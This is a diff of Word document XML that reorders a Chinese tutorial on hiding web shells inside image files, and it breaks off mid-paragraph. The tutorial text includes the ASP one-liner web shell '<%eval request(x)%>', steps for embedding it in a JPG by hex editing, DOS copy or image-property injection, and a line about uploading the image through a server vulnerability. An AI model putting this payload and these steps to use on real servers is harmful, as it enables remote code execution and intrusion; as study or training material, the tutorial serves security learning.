-                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
+                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns=""/>
                       </a:ext>
                     </a:extLst>
                   </pic:spPr>
@@ -1472,7 +1448,7 @@
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3EAFC3DF" wp14:editId="4EB286E5">
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="4419600" cy="2095500"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:docPr id="8" name="图片 8"/>
@@ -1487,7 +1463,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill rotWithShape="1">
-                    <a:blip r:embed="rId21"/>
+                    <a:blip r:embed="rId23"/>
                     <a:srcRect b="5173"/>
                     <a:stretch/>
                   </pic:blipFill>
@@ -1504,7 +1480,7 @@
                     </a:ln>
                     <a:extLst>
                       <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
-                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
+                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns=""/>
                       </a:ext>
                     </a:extLst>
                   </pic:spPr>
@@ -1518,9 +1494,6 @@
     <w:p>
       <w:pPr>
         <w:spacing w:before="156" w:after="156"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -1528,183 +1501,10 @@
         </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C578695" wp14:editId="15DD5CF0">
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="4867275" cy="2524125"/>
             <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
             <wp:docPr id="9" name="图片 9"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="1" name=""/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId22"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="4867275" cy="2524125"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="3"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>图片马制作</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="4"/>
-        <w:spacing w:before="156" w:after="156"/>
-      </w:pPr>
-      <w:r>
-        <w:t>方法</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>一：</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>C32</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>写入木马</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="156" w:after="156"/>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>随便找个</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>jpg</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>图片，使用记事本写入一句话：</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>&lt;%eval request(“x”)%&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="156" w:after="156"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C569456" wp14:editId="2FFE9E83">
-            <wp:extent cx="4000500" cy="1009650"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="21" name="图片 21"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="1" name=""/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId23"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="4000500" cy="1009650"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="156" w:after="156"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>然后打开图片，图片会损坏，不能直接用记事本写入</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="156" w:after="156"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33F42049" wp14:editId="15E6AE88">
-            <wp:extent cx="5274310" cy="1601470"/>
-            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
-            <wp:docPr id="23" name="图片 23"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -1724,7 +1524,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5274310" cy="1601470"/>
+                      <a:ext cx="4867275" cy="2524125"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -1739,13 +1539,28 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:before="156" w:after="156"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>使用</w:t>
+        <w:pStyle w:val="3"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>图片马制作</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="4"/>
+        <w:spacing w:before="156" w:after="156"/>
+      </w:pPr>
+      <w:r>
+        <w:t>方法</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>一：</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1757,19 +1572,41 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>编辑，选</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>16</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>进制</w:t>
+        <w:t>写入木马</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="156" w:after="156"/>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>随便找个</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>jpg</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>图片，使用记事本写入一句话：</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>&lt;%eval request(“x”)%&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1780,12 +1617,11 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="721C807B" wp14:editId="307233D5">
-            <wp:extent cx="4591050" cy="2219325"/>
-            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
-            <wp:docPr id="24" name="图片 24"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="4000500" cy="1009650"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="21" name="图片 21"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -1805,7 +1641,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="4591050" cy="2219325"/>
+                      <a:ext cx="4000500" cy="1009650"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -1824,13 +1660,24 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>然后打开图片，图片会损坏，不能直接用记事本写入</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="156" w:after="156"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="688C8724" wp14:editId="0CF93AAE">
-            <wp:extent cx="4981575" cy="885825"/>
-            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
-            <wp:docPr id="25" name="图片 25"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="5274310" cy="1601470"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
+            <wp:docPr id="23" name="图片 23"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -1850,7 +1697,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="4981575" cy="885825"/>
+                      <a:ext cx="5274310" cy="1601470"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -1871,7 +1718,31 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>保存好后记事本编辑可以看到不一样的形式写入</w:t>
+        <w:t>使用</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>C32</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>编辑，选</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>16</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>进制</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1882,11 +1753,12 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E091B7C" wp14:editId="789EC339">
-            <wp:extent cx="5274310" cy="931545"/>
-            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
-            <wp:docPr id="26" name="图片 26"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="4591050" cy="2219325"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+            <wp:docPr id="24" name="图片 24"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -1906,7 +1778,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5274310" cy="931545"/>
+                      <a:ext cx="4591050" cy="2219325"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -1921,76 +1793,6 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="4"/>
-        <w:spacing w:before="156" w:after="156"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>方法二</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>dos</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>下</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>copy</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>制作</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="156" w:after="156"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="156" w:after="156"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>记事本编写一个</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>asp</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>木马，保存为</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>1.asp</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
         <w:spacing w:before="156" w:after="156"/>
       </w:pPr>
       <w:r>
@@ -1998,10 +1800,10 @@
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A7786FF" wp14:editId="65F4545C">
-            <wp:extent cx="2466975" cy="800100"/>
-            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
-            <wp:docPr id="27" name="图片 27"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="4981575" cy="885825"/>
+            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
+            <wp:docPr id="25" name="图片 25"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -2021,7 +1823,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="2466975" cy="800100"/>
+                      <a:ext cx="4981575" cy="885825"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -2040,14 +1842,24 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>保存好后记事本编辑可以看到不一样的形式写入</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="156" w:after="156"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="073E8637" wp14:editId="7596EB34">
-            <wp:extent cx="5143500" cy="1285875"/>
-            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
-            <wp:docPr id="29" name="图片 29"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="5274310" cy="931545"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
+            <wp:docPr id="26" name="图片 26"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -2067,7 +1879,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5143500" cy="1285875"/>
+                      <a:ext cx="5274310" cy="931545"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -2082,19 +1894,70 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:before="156" w:after="156"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>记事本打开</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>c.jpg</w:t>
+        <w:pStyle w:val="4"/>
+        <w:spacing w:before="156" w:after="156"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>方法二</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>dos</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>下</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>copy</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>制作</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="156" w:after="156"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>记事本编写一个</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>asp</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>木马，保存为</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>1.asp</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2106,10 +1969,10 @@
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E01009D" wp14:editId="0C0C04EB">
-            <wp:extent cx="5048250" cy="742950"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="30" name="图片 30"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="2466975" cy="800100"/>
+            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
+            <wp:docPr id="27" name="图片 27"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -2129,7 +1992,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5048250" cy="742950"/>
+                      <a:ext cx="2466975" cy="800100"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -2144,47 +2007,6 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="4"/>
-        <w:spacing w:before="156" w:after="156"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>方法</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>三</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>详细信息注入</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="156" w:after="156"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>右键图片属性</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
         <w:spacing w:before="156" w:after="156"/>
       </w:pPr>
       <w:r>
@@ -2192,10 +2014,10 @@
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18FD498D" wp14:editId="126D6587">
-            <wp:extent cx="3238500" cy="2971800"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="31" name="图片 31"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="5143500" cy="1285875"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+            <wp:docPr id="29" name="图片 29"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -2206,27 +2028,20 @@
                     <pic:cNvPr id="1" name=""/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
-                  <pic:blipFill rotWithShape="1">
+                  <pic:blipFill>
                     <a:blip r:embed="rId31"/>
-                    <a:srcRect b="12359"/>
-                    <a:stretch/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
                   </pic:blipFill>
-                  <pic:spPr bwMode="auto">
+                  <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="3238500" cy="2971800"/>
+                      <a:ext cx="5143500" cy="1285875"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
                     </a:prstGeom>
-                    <a:ln>
-                      <a:noFill/>
-                    </a:ln>
-                    <a:extLst>
-                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
-                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
-                      </a:ext>
-                    </a:extLst>
                   </pic:spPr>
                 </pic:pic>
               </a:graphicData>
@@ -2243,7 +2058,13 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>然后使用记事本打开，可以发现代码也被注入里头了</w:t>
+        <w:t>记事本打开</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>c.jpg</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2256,10 +2077,10 @@
         </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FE83934" wp14:editId="7EF08EA9">
-            <wp:extent cx="4295775" cy="1200150"/>
-            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
-            <wp:docPr id="32" name="图片 32"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="5048250" cy="742950"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="30" name="图片 30"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -2279,7 +2100,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="4295775" cy="1200150"/>
+                      <a:ext cx="5048250" cy="742950"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -2294,27 +2115,25 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="3"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>图片马的使用</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="156" w:after="156"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>将制作好的图片通过漏洞上传到服务器</w:t>
+        <w:pStyle w:val="4"/>
+        <w:spacing w:before="156" w:after="156"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>方法三详细信息注入</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="156" w:after="156"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
